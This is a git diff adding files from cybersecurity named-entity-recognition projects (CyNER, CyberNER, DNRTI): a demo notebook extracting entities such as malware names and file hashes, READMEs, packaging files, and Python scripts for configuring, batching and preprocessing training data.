+ "output_type": "stream",
67
+ "text": [
68
+ "2022-02-15 11:48:17 INFO *** initialize network ***\n"
69
+ ]
70
+ },
71
+ {
72
+ "name": "stdout",
73
+ "output_type": "stream",
74
+ "text": [
75
+ "Mention: Proofpoint, Class: Organization, Start: 0, End: 10, Confidence: 0.82\n",
76
+ "Mention: FluBot, Class: Malware, Start: 156, End: 162, Confidence: 0.92\n",
77
+ "Mention: 446833e3f8b04d4c3c2d2288e456328266524e396adbfeba3769d00727481e80, Class: Indicator, Start: 163, End: 227, Confidence: 0.90\n",
78
+ "Mention: Android, Class: System, Start: 231, End: 238, Confidence: 1.00\n"
79
+ ]
80
+ }
81
+ ],
82
+ "source": [
83
+ "entities = model1.get_entities(text)\n",
84
+ "\n",
85
+ "for e in entities:\n",
86
+ " print(e)"
87
+ ]
88
+ },
89
+ {
90
+ "cell_type": "code",
91
+ "execution_count": 5,
92
+ "id": "79fcee8b",
93
+ "metadata": {},
94
+ "outputs": [],
95
+ "source": [
96
+ "del model1"
97
+ ]
98
+ },
99
+ {
100
+ "cell_type": "markdown",
101
+ "id": "b3edc170",
102
+ "metadata": {},
103
+ "source": [
104
+ "#### Model2: Using pretrained transformers and heuristics"
105
+ ]
106
+ },
107
+ {
108
+ "cell_type": "code",
109
+ "execution_count": 6,
110
+ "id": "a94605d5",
111
+ "metadata": {},
112
+ "outputs": [],
113
+ "source": [
114
+ "model2 = cyner.CyNER(transformer_model='xlm-roberta-large', use_heuristic=True, flair_model=None, priority='HTFS')"
115
+ ]
116
+ },
117
+ {
118
+ "cell_type": "code",
119
+ "execution_count": 7,
120
+ "id": "856d5fa4",
121
+ "metadata": {},
122
+ "outputs": [
123
+ {
124
+ "name": "stderr",
125
+ "output_type": "stream",
126
+ "text": [
127
+ "2022-02-15 11:48:25 INFO *** initialize network ***\n"
128
+ ]
129
+ },
130
+ {
131
+ "name": "stdout",
132
+ "output_type": "stream",
133
+ "text": [
134
+ "Mention: 446833e3f8b04d4c3c2d2288e456328266524e396adbfeba3769d00727481e80, Class: SHA256, Start: 163, End: 227, Confidence: 1.00\n",
135
+ "Mention: Proofpoint, Class: Organization, Start: 0, End: 10, Confidence: 0.82\n",
136
+ "Mention: FluBot, Class: Malware, Start: 156, End: 162, Confidence: 0.92\n",
137
+ "Mention: Android, Class: System, Start: 231, End: 238, Confidence: 1.00\n"
138
+ ]
139
+ }
140
+ ],
141
+ "source": [
142
+ "entities = model2.get_entities(text)\n",
143
+ "\n",
144
+ "for e in entities:\n",
145
+ " print(e)"
146
+ ]
147
+ },
148
+ {
149
+ "cell_type": "code",
150
+ "execution_count": 8,
151
+ "id": "1418492c",
152
+ "metadata": {},
153
+ "outputs": [],
154
+ "source": [
155
+ "del model2"
156
+ ]
157
+ },
158
+ {
159
+ "cell_type": "markdown",
160
+ "id": "dce0f612",
161
+ "metadata": {},
162
+ "source": [
163
+ "#### Model3: Using pretrained transformers with heuristics and Flair"
164
+ ]
165
+ },
166
+ {
167
+ "cell_type": "code",
168
+ "execution_count": null,
169
+ "id": "0c393f57",
170
+ "metadata": {},
171
+ "outputs": [],
172
+ "source": [
173
+ "model3 = cyner.CyNER(transformer_model='xlm-roberta-large', use_heuristic=True, flair_model='ner')"
174
+ ]
175
+ },
176
+ {
177
+ "cell_type": "code",
178
+ "execution_count": null,
179
+ "id": "097ab089",
180
+ "metadata": {},
181
+ "outputs": [],
182
+ "source": [
183
+ "entities = model3.get_entities(text)\n",
184
+ "\n",
185
+ "for e in entities:\n",
186
+ " print(e)"
187
+ ]
188
+ },
189
+ {
190
+ "cell_type": "code",
191
+ "execution_count": null,
192
+ "id": "c7f90626",
193
+ "metadata": {},
194
+ "outputs": [],
195
+ "source": [
196
+ "del model3"
197
+ ]
198
+ },
199
+ {
200
+ "cell_type": "markdown",
201
+ "id": "95beae09",
202
+ "metadata": {},
203
+ "source": [
204
+ "#### Train(finetune) transformer on user provided data"
205
+ ]
206
+ },
207
+ {
208
+ "cell_type": "code",
209
+ "execution_count": null,
210
+ "id": "ef41568a",
211
+ "metadata": {},
212
+ "outputs": [],
213
+ "source": [
214
+ "cfg = {'checkpoint_dir': '.ckpt',\n",
215
+ " 'dataset': 'dataset/mitre',\n",
216
+ " 'transformers_model': 'xlm-roberta-large',\n",
217
+ " 'lr': 5e-6,\n",
218
+ " 'epochs': 20,\n",
219
+ " 'max_seq_length': 128}\n",
220
+ "model = cyner.TransformersNER(cfg)\n",
221
+ "model.train()"
222
+ ]
223
+ },
224
+ {
225
+ "cell_type": "code",
226
+ "execution_count": null,
227
+ "id": "b664b9dd",
228
+ "metadata": {},
229
+ "outputs": [],
230
+ "source": []
231
+ }
232
+ ],
233
+ "metadata": {
234
+ "kernelspec": {
235
+ "display_name": "Python 3 (ipykernel)",
236
+ "language": "python",
237
+ "name": "python3"
238
+ },
239
+ "language_info": {
240
+ "codemirror_mode": {
241
+ "name": "ipython",
242
+ "version": 3
243
+ },
244
+ "file_extension": ".py",
245
+ "mimetype": "text/x-python",
246
+ "name": "python",
247
+ "nbconvert_exporter": "python",
248
+ "pygments_lexer": "ipython3",
249
+ "version": "3.8.10"
250
+ }
251
+ },
252
+ "nbformat": 4,
253
+ "nbformat_minor": 5
254
+ }
data/raw/CyNER/LICENSE.txt ADDED
@@ -0,0 +1,21 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ MIT License
2
+
3
+ Copyright (c) 2022 aiforsec
4
+
5
+ Permission is hereby granted, free of charge, to any person obtaining a copy
6
+ of this software and associated documentation files (the "Software"), to deal
7
+ in the Software without restriction, including without limitation the rights
8
+ to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9
+ copies of the Software, and to permit persons to whom the Software is
10
+ furnished to do so, subject to the following conditions:
11
+
12
+ The above copyright notice and this permission notice shall be included in all
13
+ copies or substantial portions of the Software.
14
+
15
+ THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16
+ IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17
+ FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18
+ AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19
+ LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20
+ OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21
+ SOFTWARE.
data/raw/CyNER/README.md ADDED
@@ -0,0 +1,41 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # CyNER: Python Library for Cybersecurity Named Entity Recognition
2
+
3
+ CyNER is a Python library for extracting cybersecurity named entities. We combine different models with priority-based merging for extracting cybersecurity entities: transformer models trained on a cybersecurity corpus for cybersecurity-specific entities, regular expression matching for identifying indicators, and NER models from Flair and SpaCy for generic entity types.
4
+
5
+ ### Getting Started
6
+ `pip install git+https://github.com/aiforsec/CyNER.git`
7
+
8
+
9
+ ### Prediction
10
+ To get prediction with pretrained NER model
11
+
12
+ ```
13
+ import cyner
14
+
15
+ model = cyner.CyNER(transformer_model='xlm-roberta-large', use_heuristic=False, flair_model=None)
16
+
17
+ text = 'Proofpoint report mentions that the German-language messages were turned off once the UK messages were established, indicating a conscious effort to spread FluBot 446833e3f8b04d4c3c2d2288e456328266524e396adbfeba3769d00727481e80 in Android phones.'
18
+
19
+ entities = model.get_entities(text)
20
+
21
+ for e in entities:
22
+ print(e)
23
+ ```
24
+
25
+ Please check `CyNER Demo` notebook for more details.
26
+
27
+
28
+ ## Training
29
+ To finetune model on user provided dataset
30
+
31
+ ```
32
+ cfg = {'checkpoint_dir': '.ckpt',
33
+ 'dataset': 'dataset/mitre',
34
+ 'transformers_model': 'xlm-roberta-large',
35
+ 'lr': 5e-6,
36
+ 'epochs': 20,
37
+ 'max_seq_length': 128}
38
+ model = cyner.TransformersNER(cfg)
39
+ model.train()
40
+ ```
41
+
data/raw/CyNER/requirements.txt ADDED
@@ -0,0 +1,19 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ flair
2
+ spacy
3
+ ipywidgets
4
+ spacy-transformers
5
+ Pillow>=7.1.0
6
+ sudachipy
7
+ sudachidict_core
8
+ uvicorn==0.11.8
9
+ jinja2==2.11.3
10
+ aiofiles==0.5.0
11
+ fastapi==0.65.2
12
+ matplotlib==3.3.1
13
+ toml
14
+ tensorboard
15
+ torch
16
+ transformers
17
+ sentencepiece
18
+ seqeval
19
+ segtok
data/raw/CyNER/setup.cfg ADDED
@@ -0,0 +1,2 @@
 
 
 
1
+ [metadata]
2
+ description-file = README.md
data/raw/CyNER/setup.py ADDED
@@ -0,0 +1,51 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ from setuptools import setup, find_packages
2
+
3
# Use the README as the long description shown on the package index.
# The encoding is given explicitly so the read does not depend on the
# platform's default locale encoding.
with open('README.md', 'r', encoding='utf-8') as f:
    readme = f.read()
version = '0.0.1'
setup(
    name='cyner',
    packages=find_packages(exclude=["tests", "models"]),
    version=version,
    license='MIT',
    description='Cybersecurity named entity recognition',
    url='https://github.com/aiforsec/CyNER',
    download_url="https://github.com/aiforsec/CyNER/archive/{}.tar.gz".format(version),
    keywords=['ner', 'nlp', 'language-model'],
    long_description=readme,
    long_description_content_type="text/markdown",
    author='Tanvirul Alam',
    author_email='tanvirul.alam@mail.rit.edu',
    classifiers=[
        'Development Status :: 4 - Beta',  # Choose either "3 - Alpha", "4 - Beta" or "5 - Production/Stable" as the current state of the package
        'Intended Audience :: Developers',  # The audience is developers
        'Intended Audience :: Science/Research',
        'Topic :: Scientific/Engineering',
        'License :: OSI Approved :: MIT License',  # Must agree with the `license` argument above
        'Programming Language :: Python :: 3',  # Python versions the package supports
    ],
    include_package_data=True,
    # test_suite='tests',
    install_requires=[
        'flair',
        'spacy',
        'ipywidgets',
        'spacy-transformers',
        'Pillow>=7.1.0',
        'sudachipy',
        'sudachidict_core',
        'uvicorn==0.11.8',
        'jinja2==2.11.3',
        'aiofiles==0.5.0',
        'fastapi==0.65.2',
        'matplotlib==3.3.1',
        'toml',
        'tensorboard',
        'torch',
        'transformers',
        'sentencepiece',
        'seqeval',
        'segtok'
    ],
    python_requires='>=3.6',
)
data/raw/CyberNER_harmonized/.gitignore ADDED
@@ -0,0 +1,63 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # Ignorer les dossiers de données et sorties volumineuses
2
+ datasets/
3
+ logs/
4
+ logs_cyberner/
5
+ output_dups/
6
+ outputs/
7
+ outputs_cyberner/
8
+ outputs_cyberner_coverage/
9
+ outputs_cyberner_dedup_coverage/
10
+
11
+ # Ignorer les fichiers spécifiques
12
+ dataset/final_ner.csv
13
+ notebooks/version.ipynb
14
+
15
+ # Ignorer les chemins absolus spécifiques
16
+ /home/yasir.ech-chammakhy/lustre/cyber_cc-lcbfvhtc9qm/users/yasir.ech-chammakhy/CyberNER/dataset/final_ner.csv
17
+ /home/yasir.ech-chammakhy/lustre/cyber_cc-lcbfvhtc9qm/users/yasir.ech-chammakhy/CyberNER/notebooks/version.ipynb
18
+
19
+ # Ignorer les fichiers temporaires
20
+ *.tmp
21
+ *.temp
22
+ *.log
23
+ *.bak
24
+
25
+ # Ignorer les environnements virtuels
26
+ venv/
27
+ *-venv/
28
+ __pycache__/
29
+ *.pyc
30
+ *.pyo
31
+
32
+ # Ignorer les fichiers spécifiques à l'environnement
33
+ .DS_Store
34
+ .env
35
+ .idea/
36
+ .vscode/
37
+
38
+ # Ignorer les fichiers volumineux
39
+ *.zip
40
+ *.tar.gz
41
+ *.model
42
+ *.bin
43
+ *.h5
44
+ *.pkl
45
+ *.npy
46
+
47
+ # Ignorer les checkpoints et modèles
48
+ checkpoints/
49
+ models/
50
+ *.pt
51
+ *.ckpt
52
+
53
+ # Ignorer les fichiers de données volumineuses
54
+ *.csv
55
+ *.json
56
+ *.jsonl
57
+ *.txt
58
+ !README.txt
59
+ !requirements.txt
60
+
61
+ # Exceptions pour les fichiers importants
62
+ !scripts/*.py
63
+ !scripts/*.sh
data/raw/CyberNER_harmonized/README.md ADDED
@@ -0,0 +1,12 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # CyberNER: A Harmonized STIX Corpus for Cybersecurity Named Entity Recognition
2
+
3
+ **Description:**
4
+
5
+ This repository contains the CyberNER project, focused on addressing schema heterogeneity in cybersecurity Named Entity Recognition (NER). We introduce **CyberNER**, a large-scale, unified corpus created by systematically harmonizing four prominent datasets (CyNER, DNRTI, APTNER, and Attacker) onto a consistent taxonomy based on the STIX 2.1 standard.
6
+
7
+ The primary goal of CyberNER is to overcome the challenges posed by incompatible annotation schemas in existing resources. By providing a standardized, STIX-aligned benchmark dataset, this project aims to facilitate the development, rigorous evaluation, and comparison of more robust, generalizable, and interoperable NER models for the cybersecurity domain.
8
+
9
+ This repository includes:
10
+ * The harmonized CyberNER dataset.
11
+ * Scripts used for data cleaning and schema harmonization.
12
+ * Code for training and evaluating benchmark NER models (e.g., BERT-CRF variants) on the CyberNER corpus.
data/raw/DNRTI/README.md ADDED
@@ -0,0 +1,4 @@
 
 
 
 
 
1
+ This repository contains the implementation corresponding to the paper http://arxiv.org/abs/2207.00232
2
+
3
+ You should have gensim==3.8, transformers, and tqdm installed in your environment.
4
+ To run the program, first run data_processing.py, then run POS_Embedding.py and wod2vec_embedding.py (sorry, that file name is misspelled) in BiLSTM_CNN, and then run Bert_retrain in Finetuning_BertCRF. Finally, you can train the model with main.py.
data/raw/DNRTI/arguments.py ADDED
@@ -0,0 +1,152 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/python3
2
+ # -*- coding: utf-8 -*-
3
+ # @Time : 2021/8/16 下午3:43
4
+ # @Author : PeiP Liu
5
+ # @FileName: arguments.py
6
+ # @Software: PyCharm
7
+ import os
8
+ import torch
9
+ import pickle
10
+ import numpy as np
11
+
12
+ # import sys
13
+ # sys.path.append(".")
14
+
15
+ # os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'
16
+ os.environ['CUDA_VISIBLE_DEVICES'] = '1'
17
+ ab_path = '/bigdata/liupeipei/Multi_features_based_semantic_augmentation_networks_for_NER_in_TI'
18
+
19
+
20
def read_pickle(file_add):
    """Load and return the object pickled in the file at ``file_add``.

    NOTE(review): ``pickle.load`` can execute arbitrary code, so this should
    only be pointed at files produced by the project's own preprocessing.
    """
    with open(file_add, 'rb') as handle:
        return pickle.load(handle)
24
+
25
+
26
def read_numpy(file_addr):
    """Load the file at ``file_addr`` with ``numpy.load`` and return the result."""
    return np.load(file_addr)
29
+
30
+
31
class BasicArgs:
    """Settings and dataset lookups shared by all model configurations.

    Every attribute is evaluated when the class body runs, i.e. at import
    time, including the two pickle reads below.
    """

    # general training hyper-parameters
    batch_size = 64
    max_seq_len = 256
    learning_rate = 5e-3
    total_train_epoch = 400

    # use the first visible GPU when CUDA is available, otherwise fall back to the CPU
    device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')

    # raw (text-level) dataset written by data_processing.py
    orig_dataset = read_pickle(ab_path + '/Result/Data/MalwareDB/orig_dict.pickle')
    num_train = orig_dataset['num_train']
    num_valid = orig_dataset['num_valid']
    num_test = orig_dataset['num_test']

    # vocabulary / label / POS / case lookup tables
    dict_dataset = read_pickle(ab_path + '/Result/Data/MalwareDB/index_dict.pickle')
    label2idx = dict_dataset['label2index']  # used for the BERT loss
    idx2label = dict_dataset['index2label']  # used when decoding predictions
    word2idx = dict_dataset['word2index']
    idx2word = dict_dataset['index2word']
    pos2idx = dict_dataset['pos2index']  # used for POS-embedding training
    idx2pos = dict_dataset['index2pos']
    case2idx = dict_dataset['case2idx']

    num_labels = len(label2idx)
54
+
55
+
56
class BertArgs(BasicArgs):
    """Configuration for the BERT fine-tuning stage."""

    output_dir = ab_path + '/Result/BERT_model/MalwareDB/'

    # sentences and their label sequences for each split, taken from the raw dataset
    train_seq_list = BasicArgs.orig_dataset['train_sentences']
    train_seq_label_list = BasicArgs.orig_dataset['train_labels']
    valid_seq_list = BasicArgs.orig_dataset['valid_sentences']
    valid_seq_label_list = BasicArgs.orig_dataset['valid_labels']
    test_seq_list = BasicArgs.orig_dataset['test_sentences']
    test_seq_label_list = BasicArgs.orig_dataset['test_labels']

    # candidate pretrained checkpoints
    # NOTE(review): model_id is presumably an index into model_list - confirm in the training script
    model_list = ['bert-base-uncased', 'bert-large-uncased', 'bert-base-cased']
    model_id = 2

    # set load_checkpoint = True to resume training from a saved model
    load_checkpoint = False
    weight_decay_finetune = 1e-5
    lr_crf_fc = 1e-5
    weight_decay_crf_fc = 1e-5
    warmup_proportion = 0.002

    # Larger batches tend to work better, but GPU memory is often the limit.
    # Accumulating the gradients of X consecutive batches before clearing them
    # gives the same effect as a batch of size batch_size * X.
    # ref: https://blog.csdn.net/Princeicon/article/details/108058822
    gradient_accumulation_steps = 4
81
+
82
+
83
class BilstmCnnArgs(BasicArgs):
    """Configuration for the BiLSTM-CNN model.

    As with ``BasicArgs``, every attribute (including the pickle and ``.npy``
    reads) is evaluated once when the class body runs at import time.
    """

    output_dir = ab_path + '/Result/LSTM_model/MalwareDB/'

    # maximum sentence / word lengths recorded by data_processing.py
    real_sent_maxlen = BasicArgs.orig_dataset['sent_maxlen']
    real_word_maxlen = BasicArgs.orig_dataset['word_maxlen']

    # padded id sequences of the training split
    train_id_pad = read_pickle(ab_path + '/Result/Data/MalwareDB/train_id_pad_dict.pickle')
    train_wordids_pad = train_id_pad['train_wordids_pad']
    train_charids_pad = train_id_pad['train_charids_pad']
    train_labelids_pad = train_id_pad['train_labelids_pad']
    train_posids_pad = train_id_pad['train_posids_pad']
    train_caseids_pad = train_id_pad['train_caseids_pad']

    # padded id sequences of the validation split
    valid_id_pad = read_pickle(ab_path + '/Result/Data/MalwareDB/valid_id_pad_dict.pickle')
    valid_wordids_pad = valid_id_pad['valid_wordids_pad']
    valid_charids_pad = valid_id_pad['valid_charids_pad']
    valid_labelids_pad = valid_id_pad['valid_labelids_pad']
    valid_posids_pad = valid_id_pad['valid_posids_pad']
    valid_caseids_pad = valid_id_pad['valid_caseids_pad']

    # padded id sequences of the test split
    test_id_pad = read_pickle(ab_path + '/Result/Data/MalwareDB/test_id_pad_dict.pickle')
    test_wordids_pad = test_id_pad['test_wordids_pad']
    test_charids_pad = test_id_pad['test_charids_pad']
    test_labelids_pad = test_id_pad['test_labelids_pad']
    test_posids_pad = test_id_pad['test_posids_pad']
    test_caseids_pad = test_id_pad['test_caseids_pad']

    # embedding tables stored as numpy arrays
    word_emb_table = read_numpy(ab_path + '/Result/Embedding/MalwareDB/word_embedding.npy')
    char_emb_table = read_numpy(ab_path + '/Result/Embedding/MalwareDB/char_embedding.npy')
    pos_emb_table = read_numpy(ab_path + '/Result/Embedding/MalwareDB/pos_embedding.npy')
    case_emb_table = read_numpy(ab_path + '/Result/Embedding/MalwareDB/case_embedding.npy')

    char_embed_dim = 30
    word_embed_dim = 50
    pos_embed_dim = 10
    case_embed_dim = 8
    # derived (30 + 50 + 10 + 8 = 98) so it cannot drift from the four dims above
    input_dim = char_embed_dim + word_embed_dim + pos_embed_dim + case_embed_dim
    hid_dim = 256
    model_dim = 128

    transformer_num_blocks = 4
    transformer_num_heads = 8

    # same table as BasicArgs.idx2word; reused instead of reading index_dict.pickle again
    index2word = BasicArgs.idx2word
    word2vec = read_numpy(ab_path + '/Result/Embedding/MalwareDB/word2vec_embedding.npy')
    sim_num = 4

    bilstm_layers = 4

    dropout_rate = 0.5
    attention_type = 'general'

    # NOTE(review): min_delta / patience look like early-stopping settings - confirm in the training loop
    min_delta = 0.0001
    patience = 12

    lr = 5e-4
    weight_decay = 0.001
    min_lr = 5e-5
    lr_decay_factor = 0.5

    # reserved indices
    word_pad_indx = 0
    label_bos_indx = 0
    label_eos_indx = 1
    label_pad_indx = 2
data/raw/DNRTI/construct_input.py ADDED
@@ -0,0 +1,45 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ from torch.utils.data import DataLoader
2
+ from torch.nn.utils.rnn import pad_sequence
3
+ import pandas as pd
4
+ import torch
5
+
6
+
7
# Collate function: receives a list of samples, where each sample is a
# sequence [token_tensor, segmentation_tensor, label_tensor].
def create_format_input(input):
    """Turn a list of samples into padded batch tensors.

    :param input: list of samples ``(token_tensor, segmentation_tensor, label_tensor)``;
        the label of the first sample decides whether labels are collected at all.
    :return: ``(tokens, segmentations, mask, labels)`` where tokens and
        segmentations are zero-padded to the longest sequence in the batch,
        mask is 1 wherever the padded token id is non-zero, and labels is the
        stacked label tensor or ``None`` when the first sample has no label.
    """
    token_seqs = []
    segment_seqs = []
    for sample in input:
        token_seqs.append(sample[0])
        segment_seqs.append(sample[1])

    has_labels = input[0][2] is not None
    label_ids = torch.stack([sample[2] for sample in input]) if has_labels else None

    # pad_sequence pads every sequence up to the longest one in this batch
    tokens_tensors = pad_sequence(token_seqs, batch_first=True, padding_value=0)
    segmentation_tensors = pad_sequence(segment_seqs, batch_first=True, padding_value=0)

    # attention mask: 1 for real tokens, 0 for padding (token id 0)
    masked_tensors = (tokens_tensors != 0).to(torch.long)

    return tokens_tensors, segmentation_tensors, masked_tensors, label_ids
27
+
28
+
29
def create_batch_data(traindata, batch_size=64):
    """Yield a single ``DataLoader`` over ``traindata``.

    This is a generator that yields exactly one item, the loader itself, so
    callers obtain it with ``next(create_batch_data(data))`` or a ``for`` loop.

    :param traindata: dataset whose samples are accepted by ``create_format_input``
    :param batch_size: number of samples per batch (defaults to the previous
        hard-coded value of 64)
    """
    trainloader = DataLoader(traindata, batch_size=batch_size, collate_fn=create_format_input)
    yield trainloader
33
+
34
+
35
def create_test_batch_data():
    """Predict labels for the test split and return them as a DataFrame.

    NOTE(review): ``CreateDataset``, ``tokenizer``, ``model`` and
    ``get_predictions`` are neither defined nor imported in this module; they
    must exist as module-level names before this function can run.

    :return: DataFrame with one column, ``Category``, holding the predicted
        label name for every test sample
    """
    # construct the dataset for prediction
    test_dataset = CreateDataset('test', tokenizer=tokenizer)
    test_dataloader = DataLoader(test_dataset, batch_size=256, collate_fn=create_format_input)
    predictions = get_predictions(model, test_dataloader)
    # invert label -> index into index -> label
    index_map = {v: k for k, v in test_dataset.label_map.items()}

    # tolist() is available on torch tensors, numpy arrays and pandas objects
    df = pd.DataFrame({'Category': predictions.tolist()})
    # index_map is a dict, so it is indexed rather than called
    df['Category'] = df['Category'].apply(lambda x: index_map[x])
    return df
44
+
45
+
data/raw/DNRTI/data_processing.py ADDED
@@ -0,0 +1,193 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/python3
2
+ # -*- coding: utf-8 -*-
3
+ # @Time : 2021/9/1 上午10:52
4
+ # @Author : PeiP Liu
5
+ # @FileName: data_processing.py
6
+ # @Software: PyCharm
7
+
8
+ import torch
9
+ import torch.nn as nn
10
+ import pickle
11
+ import numpy as np
12
+ from data_utils import *
13
+
14
+ # get the text data from orig_file
15
+ train_dataset = processing_orgdata('train')
16
+ valid_dataset = processing_orgdata('valid')
17
+ test_dataset = processing_orgdata('test')
18
+
19
+ # all_str_sentences = train_dataset[3] + valid_dataset[3] + test_dataset[3]
20
+ # all_str_sentences = train_dataset[3] + valid_dataset[3] + test_dataset[3]
21
+ # with open('Result/Data/sentences_text', 'a+') as file:
22
+ # for sent in all_str_sentences:
23
+ # file.write(sent+'\n')
24
+ # file.close()
25
+
26
+ # get the max length of sentence(word) and word(char)
27
+ sent_maxlen = max(train_dataset[4], valid_dataset[4], test_dataset[4]) # 这里的最长后续要根据数据的分布情况调整
28
+ word_maxlen = max(train_dataset[5], valid_dataset[5], test_dataset[5]) # 这里的最长后续要根据数据的分布情况调整
29
+
30
+ # construct the dict of
31
+ build_vocab_sentences = train_dataset[0] + valid_dataset[0] + test_dataset[0]
32
+ build_vocab_sentences_labels = train_dataset[1] + valid_dataset[1] + test_dataset[1]
33
+ build_vocab_sentences_pos = train_dataset[2] + valid_dataset[2] + test_dataset[2]
34
+
35
+ # create the dict for storing dataset
36
+ orig_dict = dict(all_sentences=build_vocab_sentences,
37
+ all_sentences_labels=build_vocab_sentences_labels,
38
+ all_sentences_pos=build_vocab_sentences_pos,
39
+ train_sentences=train_dataset[0],
40
+ valid_sentences=valid_dataset[0],
41
+ test_sentences=test_dataset[0],
42
+ train_labels=train_dataset[1],
43
+ valid_labels=valid_dataset[1],
44
+ test_labels=test_dataset[1],
45
+ train_pos=train_dataset[2],
46
+ valid_pos=valid_dataset[2],
47
+ test_pos=test_dataset[2],
48
+ sent_maxlen=sent_maxlen,
49
+ word_maxlen=word_maxlen,
50
+ num_train=train_dataset[-1],
51
+ num_valid=valid_dataset[-1],
52
+ num_test=test_dataset[-1]
53
+ )
54
+
55
+ with open('Result/Data/MalwareDB/orig_dict.pickle', 'wb') as file:
56
+ pickle.dump(orig_dict, file) # can be used for bert
57
+
58
+ # the dict result,后续我们需要增强字符字典的内容
59
+ build_vocab_result = build_vocab(build_vocab_sentences, build_vocab_sentences_labels, build_vocab_sentences_pos)
60
+ case2idx, case_emb = case_feature()
61
+
62
+ # create the index dict
63
+ index_dict = dict(word2index=build_vocab_result[0],
64
+ index2word=build_vocab_result[1],
65
+ char2index=build_vocab_result[2],
66
+ index2char=build_vocab_result[3],
67
+ label2index=build_vocab_result[4],
68
+ index2label=build_vocab_result[5],
69
+ pos2index=build_vocab_result[6],
70
+ index2pos=build_vocab_result[7],
71
+ case2idx=case2idx
72
+ )
73
+
74
+ with open('Result/Data/MalwareDB/index_dict.pickle', 'wb') as file:
75
+ pickle.dump(index_dict, file) # can be used for others
76
+
77
+ # convert the orig_train_text to id
78
+ train_text2ids = text2ids(train_dataset[0], train_dataset[1],
79
+ train_dataset[2], build_vocab_result[0],build_vocab_result[2],
80
+ build_vocab_result[4], build_vocab_result[6], case2idx)
81
+
82
+ train_id_dict = dict(train_sents_wordids=train_text2ids[0],
83
+ train_sents_charids=train_text2ids[1],
84
+ train_sents_labelids=train_text2ids[2],
85
+ train_sents_posids=train_text2ids[3],
86
+ train_sents_caseids=train_text2ids[4]
87
+ )
88
+
89
+ with open('Result/Data/MalwareDB/train_id_dict.pickle', 'wb') as file:
90
+ pickle.dump(train_id_dict, file) # can be used for others
91
+
92
+ # convert the orig_valid_text to id
93
+ valid_text2ids = text2ids(valid_dataset[0], valid_dataset[1],
94
+ valid_dataset[2], build_vocab_result[0], build_vocab_result[2],
95
+ build_vocab_result[4], build_vocab_result[6], case2idx)
96
+
97
+ valid_id_dict = dict(valid_sents_wordids=valid_text2ids[0],
98
+ valid_sents_charids=valid_text2ids[1],
99
+ valid_sents_labelids=valid_text2ids[2],
100
+ valid_sents_posids=valid_text2ids[3],
101
+ valid_sents_caseids=valid_text2ids[4]
102
+ )
103
+
104
+ with open('Result/Data/MalwareDB/valid_id_dict.pickle', 'wb') as file:
105
+ pickle.dump(valid_id_dict, file) # can be used for others
106
+
107
+ # convert the orig_test_text to id
108
+ test_text2ids = text2ids(test_dataset[0], test_dataset[1],
109
+ test_dataset[2], build_vocab_result[0], build_vocab_result[2],
110
+ build_vocab_result[4], build_vocab_result[6], case2idx)
111
+
112
# Bundle the id-encoded test split. The keys carry the ``test_`` prefix so
# they follow the same naming as train_id_dict and valid_id_dict; they had
# been copy-pasted with a ``valid_`` prefix.
test_id_dict = dict(test_sents_wordids=test_text2ids[0],
                    test_sents_charids=test_text2ids[1],
                    test_sents_labelids=test_text2ids[2],
                    test_sents_posids=test_text2ids[3],
                    test_sents_caseids=test_text2ids[4]
                    )
118
+
119
